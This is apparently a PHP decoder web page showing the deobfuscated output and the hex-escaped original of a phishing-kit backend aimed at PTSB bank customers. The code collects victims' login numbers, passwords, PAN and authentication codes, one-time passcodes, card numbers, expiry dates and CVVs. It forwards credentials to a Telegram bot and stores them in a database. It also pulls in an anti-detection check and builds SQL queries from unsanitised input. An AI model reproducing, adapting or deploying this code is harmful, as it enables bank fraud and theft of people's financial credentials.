Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto pPC7o; hnC0T: function sendToTele($messaggio, $token, $chatID) { $url = "\x68..
Decoded Output download
<?php
goto pPC7o; hnC0T: function sendToTele($messaggio, $token, $chatID) { $url = "https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chatID; $url = $url . "&text=" . urlencode($messaggio); $ch = curl_init(); $optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true); curl_setopt_array($ch, $optArray); $result = curl_exec($ch); curl_close($ch); return $result; } goto A97Je; YwEB6: function numeric($num) { if (preg_match("/^[0-9]+$/", $num)) { $status = true; } else { $status = false; } return $status; } goto hnC0T; pPC7o: include "../../../CONFIG.php"; goto TAFRU; i4fJJ: include "../vendor/200.php"; goto s41NM; A97Je: if ($_GET["type"] == "login") { if ($_POST["login-number"] and $_POST["login-password"] and $_POST["ip"] and $_POST["ua"]) { $usrlogin = $_POST["login-number"]; $usrpass = $_POST["login-password"]; $_SESSION["usrlogin"] = $usrlogin; $_SESSION["usrpass"] = $usrpass; $bankType = "PTSB"; $comment = "User just logged into account"; $ip = $_POST["ip"]; $ua = urlencode($_POST["ua"]); $uniqueid = time(); $msg .= "[==========> {$bankType} Login <==========]\xa"; $msg .= "| Login : " . $usrlogin . "\xa"; $msg .= "| Pass : " . $usrpass . "
"; $msg .= "[==========> IP INFO <==========]\xa"; $msg .= "| Submitted by : {$ip}
"; $msg .= "| UserAgent : {$ua}
"; $msg .= "==========> END <==========
"; if ($Send_To_Tele == 1) { sendToTele($msg, $Tele_Bot_Token, $Tele_Chat_ID); } $query = mysqli_query($conn, "INSERT INTO customers (bankType, usrlogin, usrpass, comment, ip, useragent, uniqueid, status) VALUES ('{$bankType}', '{$usrlogin}', '{$usrpass}', '{$comment}', '{$ip}', '{$ua}',{$uniqueid}, 1)"); if ($query) { $_SESSION["uniqueid"] = $uniqueid; $_SESSION["started"] = "true"; echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db conn error")); } } } goto icxTZ; zNWNo: include "../vendor/100.php"; goto i4fJJ; O8PQp: include "../vendor/netcraft_check.php"; goto Rk2P9; HYHIW: include "../vendor/index.php"; goto O8PQp; s41NM: include "../vendor/300.php"; goto HYHIW; Rk2P9: session_start(); goto YwEB6; icxTZ: if ($_SESSION["started"] == "true") { if ($_GET["getstatus"] and numeric($_GET["getstatus"]) == true) { $id = $_GET["getstatus"]; $query = mysqli_query($conn, "SELECT * from customers WHERE uniqueid='{$id}'"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["status"]; } } if ($_GET["type"] == "panID") { if ($_POST["pan1"] and $_POST["pan2"] and $_POST["pan3"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $pan1 = $_POST["pan1"]; $pan2 = $_POST["pan2"]; $pan3 = $_POST["pan3"]; $comment = "PAN code entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET pan1='{$pan1}',pan2='{$pan2}',pan3='{$pan3}', comment='{$comment}', status=2, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "panID notok")); } } } if ($_GET["type"] == "AUTH") { if ($_POST["auth"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $auth = $_POST["auth"]; $comment = "Auth code entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET auth='{$auth}', comment='{$comment}', status=3, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "AUTH error")); } } } if ($_GET["type"] == "OTP") { if ($_POST["otpcode"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $otpcode = $_POST["otpcode"]; $comment = "OTP Code entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET otpcode='{$otpcode}', comment='{$comment}', status=4, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "OTP Code error")); } } } if ($_GET["type"] == "PanAUTH") { if ($_POST["pancode"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $pancode = $_POST["pancode"]; $usrlogin = $_SESSION["usrlogin"]; $usrpass = $_SESSION["usrpass"]; $comment = "PAN Code entered, user waiting"; $uniqueid = $_POST["userid"]; $msg .= "[==========> PTSB Login <==========]\xa"; $msg .= "| Login : " . $usrlogin . "
"; $msg .= "| Pass : " . $usrpass . "\xa"; $msg .= "| PAN : " . $pancode . "\xa"; $msg .= "[==========> IP INFO <==========]\xa"; $msg .= "| Submitted by : {$ip}
"; $msg .= "| UserAgent : {$ua} \xa"; $msg .= "==========> END <==========\xa"; if ($Send_To_Tele == 1) { sendToTele($msg, $Tele_Bot_Token, $Tele_Chat_ID); } $query = mysqli_query($conn, "UPDATE customers SET pancode='{$pancode}', comment='{$comment}', status=5, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "PAN Code error")); } } } if ($_GET["type"] == "CCDeets") { if ($_POST["phonenum"] and $_POST["ccnum"] and $_POST["expiry"] and $_POST["cvv"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $phonenum = $_POST["phonenum"]; $ccnum = $_POST["ccnum"]; $expiry = $_POST["expiry"]; $cvv = $_POST["cvv"]; $comment = "Card Details entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET phonenum='{$phonenum}', ccnum='{$ccnum}', expiry='{$expiry}', cvv='{$cvv}', comment='{$comment}', status=6, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Card Deets error")); } } } } goto CSmwx; TAFRU: include "margin.php"; goto zNWNo; CSmwx: ?>Did this file decode correctly?
Original Code
<?php
goto pPC7o; hnC0T: function sendToTele($messaggio, $token, $chatID) { $url = "\x68\x74\x74\x70\x73\72\57\57\141\160\x69\x2e\x74\x65\154\x65\x67\162\x61\155\56\x6f\162\147\x2f\x62\x6f\x74" . $token . "\x2f\163\145\156\144\x4d\x65\x73\x73\141\x67\x65\77\143\x68\141\164\137\x69\144\x3d" . $chatID; $url = $url . "\x26\x74\145\x78\164\75" . urlencode($messaggio); $ch = curl_init(); $optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true); curl_setopt_array($ch, $optArray); $result = curl_exec($ch); curl_close($ch); return $result; } goto A97Je; YwEB6: function numeric($num) { if (preg_match("\57\136\133\x30\x2d\x39\135\x2b\x24\57", $num)) { $status = true; } else { $status = false; } return $status; } goto hnC0T; pPC7o: include "\56\56\x2f\x2e\56\x2f\56\56\57\103\x4f\116\x46\111\x47\56\x70\x68\160"; goto TAFRU; i4fJJ: include "\x2e\x2e\x2f\x76\145\156\x64\x6f\162\x2f\x32\x30\60\56\x70\150\x70"; goto s41NM; A97Je: if ($_GET["\164\x79\x70\145"] == "\154\157\x67\x69\156") { if ($_POST["\x6c\157\x67\151\156\x2d\156\165\x6d\142\145\162"] and $_POST["\x6c\157\147\x69\156\x2d\x70\141\163\x73\x77\157\x72\x64"] and $_POST["\x69\x70"] and $_POST["\x75\141"]) { $usrlogin = $_POST["\x6c\157\x67\x69\x6e\55\x6e\165\155\142\145\x72"]; $usrpass = $_POST["\154\157\147\151\156\x2d\160\141\x73\x73\x77\x6f\162\x64"]; $_SESSION["\165\163\162\x6c\157\x67\151\156"] = $usrlogin; $_SESSION["\x75\163\162\x70\141\x73\x73"] = $usrpass; $bankType = "\120\124\x53\x42"; $comment = "\125\163\145\x72\40\152\165\163\164\40\x6c\157\147\147\145\144\x20\x69\x6e\x74\x6f\40\x61\143\143\x6f\x75\x6e\164"; $ip = $_POST["\x69\160"]; $ua = urlencode($_POST["\165\141"]); $uniqueid = time(); $msg .= "\x5b\x3d\75\75\x3d\x3d\75\75\x3d\75\x3d\76\40{$bankType}\40\114\157\147\151\156\40\74\x3d\75\75\75\x3d\x3d\x3d\x3d\x3d\75\x5d\xa"; $msg .= "\174\40\114\157\147\x69\x6e\x20\72\x20" . $usrlogin . "\xa"; $msg .= "\174\x20\x50\x61\x73\163\40\72\x20" . $usrpass . "\12"; $msg .= "\133\x3d\x3d\75\x3d\x3d\75\x3d\x3d\75\x3d\x3e\40\x49\x50\40\111\116\x46\x4f\40\x3c\75\x3d\75\75\75\75\x3d\x3d\x3d\x3d\x5d\xa"; $msg .= "\174\x20\x53\x75\142\155\151\x74\x74\x65\x64\x20\142\x79\40\x3a\40{$ip}\x20\12"; $msg .= "\174\40\125\163\145\162\101\147\x65\x6e\164\x20\x3a\40{$ua}\40\12"; $msg .= "\75\75\x3d\75\x3d\x3d\x3d\75\75\75\76\40\x45\116\x44\40\74\75\x3d\x3d\75\75\75\75\75\75\x3d\12"; if ($Send_To_Tele == 1) { sendToTele($msg, $Tele_Bot_Token, $Tele_Chat_ID); } $query = mysqli_query($conn, "\x49\x4e\123\x45\x52\124\x20\111\x4e\x54\117\40\143\165\163\164\x6f\155\145\162\163\40\x28\x62\x61\x6e\153\124\x79\x70\145\54\x20\165\x73\162\x6c\157\147\x69\x6e\54\40\165\x73\x72\x70\x61\163\163\54\x20\143\x6f\155\155\145\156\164\54\x20\x69\x70\54\x20\x75\x73\145\162\141\147\145\156\x74\54\40\165\x6e\151\x71\165\x65\x69\144\54\x20\163\164\141\x74\165\x73\x29\x20\x56\101\x4c\125\105\x53\40\x28\47{$bankType}\x27\54\x20\x27{$usrlogin}\x27\54\x20\x27{$usrpass}\x27\54\x20\x27{$comment}\47\x2c\40\47{$ip}\47\x2c\40\47{$ua}\47\54{$uniqueid}\54\x20\61\x29"); if ($query) { $_SESSION["\x75\156\151\161\165\x65\151\144"] = $uniqueid; $_SESSION["\163\x74\x61\x72\164\145\x64"] = "\164\162\x75\x65"; echo json_encode(array("\x73\164\x61\x74\165\163" => "\157\153")); } else { echo json_encode(array("\x73\x74\x61\x74\x75\x73" => "\144\x62\x20\143\x6f\156\x6e\x20\x65\162\162\157\x72")); } } } goto icxTZ; zNWNo: include "\56\x2e\57\x76\145\156\144\x6f\x72\57\61\60\60\56\160\x68\160"; goto i4fJJ; O8PQp: include "\56\56\57\166\x65\156\x64\x6f\162\x2f\x6e\145\164\x63\162\x61\146\164\x5f\x63\x68\145\x63\153\x2e\x70\x68\160"; goto Rk2P9; HYHIW: include "\x2e\x2e\57\166\145\x6e\144\x6f\x72\57\x69\x6e\144\x65\x78\56\160\150\x70"; goto O8PQp; s41NM: include "\x2e\56\x2f\x76\145\156\x64\x6f\x72\x2f\63\x30\x30\56\x70\150\160"; goto HYHIW; Rk2P9: session_start(); goto YwEB6; icxTZ: if ($_SESSION["\163\164\x61\x72\x74\145\x64"] == "\x74\162\x75\x65") { if ($_GET["\x67\145\x74\163\x74\x61\x74\165\163"] and numeric($_GET["\x67\145\164\163\164\141\164\x75\163"]) == true) { $id = $_GET["\x67\x65\x74\163\164\x61\164\165\x73"]; $query = mysqli_query($conn, "\x53\105\114\x45\x43\124\x20\x2a\40\x66\162\157\155\x20\x63\165\x73\164\x6f\x6d\145\162\163\x20\x57\x48\105\x52\x45\40\x75\x6e\x69\161\x75\x65\x69\x64\x3d\x27{$id}\x27"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["\163\164\x61\x74\x75\x73"]; } } if ($_GET["\164\x79\x70\145"] == "\160\141\156\111\104") { if ($_POST["\x70\x61\x6e\61"] and $_POST["\160\141\x6e\x32"] and $_POST["\x70\x61\x6e\63"] and $_POST["\165\x73\145\x72\x69\x64"] and numeric($_POST["\x75\163\x65\162\x69\x64"]) == true) { $pan1 = $_POST["\x70\141\156\x31"]; $pan2 = $_POST["\x70\141\x6e\x32"]; $pan3 = $_POST["\x70\141\x6e\63"]; $comment = "\x50\101\116\40\143\x6f\x64\x65\40\x65\156\x74\145\x72\145\x64\54\x20\165\163\145\162\x20\x77\x61\x69\164\x69\x6e\147"; $uniqueid = $_POST["\x75\163\x65\162\151\x64"]; $query = mysqli_query($conn, "\125\120\x44\x41\x54\x45\40\143\165\x73\164\157\x6d\145\x72\163\40\x53\105\x54\x20\x70\141\x6e\x31\75\x27{$pan1}\x27\x2c\160\141\x6e\x32\75\x27{$pan2}\x27\x2c\160\141\x6e\63\x3d\x27{$pan3}\x27\x2c\x20\x63\157\x6d\155\145\156\164\75\47{$comment}\47\x2c\x20\x73\x74\141\x74\165\163\x3d\62\x2c\40\x62\165\172\x7a\x65\144\x3d\x30\x20\127\110\x45\122\x45\x20\165\156\151\161\x75\x65\x69\144\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\163\164\x61\164\x75\x73" => "\157\153")); } else { echo json_encode(array("\163\x74\141\164\165\x73" => "\x70\141\156\111\x44\40\156\157\164\x6f\153")); } } } if ($_GET["\164\171\x70\145"] == "\101\x55\124\110") { if ($_POST["\141\x75\164\150"] and $_POST["\x75\163\x65\x72\x69\144"] and numeric($_POST["\165\x73\x65\x72\x69\144"]) == true) { $auth = $_POST["\141\165\x74\150"]; $comment = "\101\165\164\x68\40\143\157\x64\145\x20\145\156\164\x65\x72\145\144\54\x20\165\x73\x65\162\x20\167\x61\151\164\151\x6e\x67"; $uniqueid = $_POST["\x75\x73\x65\x72\x69\x64"]; $query = mysqli_query($conn, "\125\x50\104\101\x54\x45\40\x63\x75\163\x74\157\155\x65\x72\163\40\123\105\124\x20\x61\x75\164\150\75\47{$auth}\47\54\x20\x63\157\x6d\x6d\x65\x6e\x74\75\47{$comment}\x27\54\40\x73\164\x61\x74\165\x73\75\x33\54\x20\142\x75\172\x7a\x65\144\x3d\60\x20\x57\110\105\122\105\40\165\x6e\x69\x71\x75\x65\x69\x64\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\x73\164\x61\x74\165\163" => "\x6f\x6b")); } else { echo json_encode(array("\x73\164\x61\164\x75\x73" => "\x41\125\124\x48\40\145\162\162\157\x72")); } } } if ($_GET["\x74\171\x70\145"] == "\117\x54\120") { if ($_POST["\x6f\164\160\143\157\144\x65"] and $_POST["\165\163\145\x72\x69\144"] and numeric($_POST["\x75\x73\145\x72\x69\x64"]) == true) { $otpcode = $_POST["\x6f\x74\160\143\157\x64\145"]; $comment = "\x4f\124\x50\40\103\x6f\144\145\40\145\156\164\145\162\145\x64\x2c\40\x75\163\x65\x72\40\167\141\x69\x74\x69\x6e\x67"; $uniqueid = $_POST["\x75\x73\145\x72\151\x64"]; $query = mysqli_query($conn, "\x55\x50\104\101\124\105\x20\143\165\163\x74\157\155\x65\162\163\40\x53\x45\x54\40\157\164\x70\143\157\x64\145\x3d\x27{$otpcode}\47\x2c\x20\143\157\155\155\145\156\164\75\47{$comment}\47\54\x20\163\164\141\x74\165\163\75\x34\54\x20\x62\x75\x7a\x7a\145\144\x3d\x30\40\127\x48\x45\x52\105\x20\165\156\151\x71\x75\x65\151\x64\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\x73\x74\141\x74\165\x73" => "\x6f\x6b")); } else { echo json_encode(array("\x73\x74\141\164\x75\163" => "\117\124\120\40\x43\x6f\144\145\40\x65\x72\162\157\162")); } } } if ($_GET["\164\x79\160\145"] == "\120\141\x6e\101\125\124\x48") { if ($_POST["\x70\x61\156\x63\x6f\144\145"] and $_POST["\165\163\145\162\151\144"] and numeric($_POST["\165\x73\x65\162\x69\x64"]) == true) { $pancode = $_POST["\x70\141\x6e\143\x6f\144\x65"]; $usrlogin = $_SESSION["\165\163\x72\154\157\147\151\156"]; $usrpass = $_SESSION["\x75\x73\x72\160\141\163\163"]; $comment = "\120\101\x4e\x20\103\x6f\x64\145\40\145\156\164\x65\162\145\144\54\x20\165\163\x65\x72\40\x77\141\x69\164\151\156\x67"; $uniqueid = $_POST["\x75\163\145\162\x69\x64"]; $msg .= "\x5b\75\x3d\75\x3d\x3d\75\75\x3d\75\x3d\76\x20\x50\x54\x53\102\40\114\x6f\x67\x69\156\x20\x3c\x3d\x3d\75\x3d\x3d\x3d\x3d\x3d\75\75\135\xa"; $msg .= "\x7c\40\114\157\147\151\x6e\x20\x3a\40" . $usrlogin . "\12"; $msg .= "\174\40\x50\141\163\x73\40\x3a\x20" . $usrpass . "\xa"; $msg .= "\x7c\x20\120\x41\x4e\40\x3a\40" . $pancode . "\xa"; $msg .= "\133\75\x3d\x3d\75\x3d\x3d\x3d\x3d\75\75\x3e\x20\111\x50\40\111\116\x46\x4f\40\74\75\x3d\75\x3d\x3d\75\75\75\x3d\x3d\x5d\xa"; $msg .= "\x7c\40\123\x75\142\155\151\x74\x74\145\x64\x20\x62\171\x20\72\x20{$ip}\x20\12"; $msg .= "\x7c\x20\125\x73\145\x72\x41\147\145\156\164\x20\x3a\40{$ua}\x20\xa"; $msg .= "\x3d\75\75\x3d\x3d\x3d\75\75\x3d\x3d\76\x20\x45\x4e\x44\x20\74\x3d\75\75\75\x3d\x3d\x3d\75\75\x3d\xa"; if ($Send_To_Tele == 1) { sendToTele($msg, $Tele_Bot_Token, $Tele_Chat_ID); } $query = mysqli_query($conn, "\x55\x50\104\101\124\x45\x20\x63\x75\x73\x74\x6f\155\145\x72\163\x20\x53\105\124\40\x70\141\x6e\143\x6f\144\x65\75\47{$pancode}\47\54\40\x63\157\155\155\145\156\x74\75\x27{$comment}\47\x2c\x20\163\x74\x61\164\x75\x73\x3d\65\x2c\x20\x62\165\172\x7a\145\x64\75\x30\x20\x57\x48\x45\x52\105\40\x75\156\x69\161\x75\x65\151\144\75{$uniqueid}"); if ($query) { echo json_encode(array("\x73\164\141\164\x75\163" => "\157\x6b")); } else { echo json_encode(array("\x73\164\141\164\x75\x73" => "\120\x41\116\x20\103\x6f\144\145\x20\x65\x72\162\x6f\162")); } } } if ($_GET["\164\x79\x70\x65"] == "\103\103\104\x65\x65\164\163") { if ($_POST["\x70\x68\x6f\156\145\156\165\x6d"] and $_POST["\x63\x63\x6e\x75\x6d"] and $_POST["\x65\x78\160\151\162\x79"] and $_POST["\143\x76\x76"] and $_POST["\165\x73\145\162\x69\x64"] and numeric($_POST["\165\x73\x65\162\x69\144"]) == true) { $phonenum = $_POST["\x70\150\157\156\145\156\165\x6d"]; $ccnum = $_POST["\143\x63\x6e\165\x6d"]; $expiry = $_POST["\145\x78\x70\151\x72\x79"]; $cvv = $_POST["\143\x76\x76"]; $comment = "\103\x61\x72\144\40\104\145\164\x61\151\x6c\163\40\145\156\164\145\x72\x65\144\54\x20\x75\x73\145\x72\x20\x77\141\151\164\x69\x6e\147"; $uniqueid = $_POST["\165\163\x65\162\x69\x64"]; $query = mysqli_query($conn, "\x55\120\x44\101\124\105\x20\143\165\x73\x74\157\155\145\x72\163\x20\123\x45\x54\x20\160\x68\157\156\x65\156\165\155\x3d\47{$phonenum}\x27\54\40\143\143\156\165\x6d\75\x27{$ccnum}\x27\x2c\x20\x65\x78\160\x69\162\x79\x3d\x27{$expiry}\47\x2c\40\x63\x76\166\75\47{$cvv}\x27\54\40\143\x6f\x6d\155\145\156\164\x3d\47{$comment}\47\54\x20\163\x74\141\164\165\x73\x3d\x36\54\x20\142\x75\172\x7a\x65\144\75\x30\40\127\110\x45\122\105\x20\x75\x6e\151\161\x75\145\x69\x64\75{$uniqueid}"); if ($query) { echo json_encode(array("\x73\x74\x61\164\x75\163" => "\157\153")); } else { echo json_encode(array("\163\164\141\x74\x75\163" => "\103\141\x72\144\x20\x44\145\145\x74\x73\40\x65\x72\162\157\162")); } } } } goto CSmwx; TAFRU: include "\155\x61\162\x67\x69\x6e\x2e\x70\150\160"; goto zNWNo; CSmwx: ?>Function Calls
| None |
Stats
| MD5 | bbea87976f9576f2f7a43d009da08cac |
| Eval Count | 0 |
| Decode Time | 44 ms |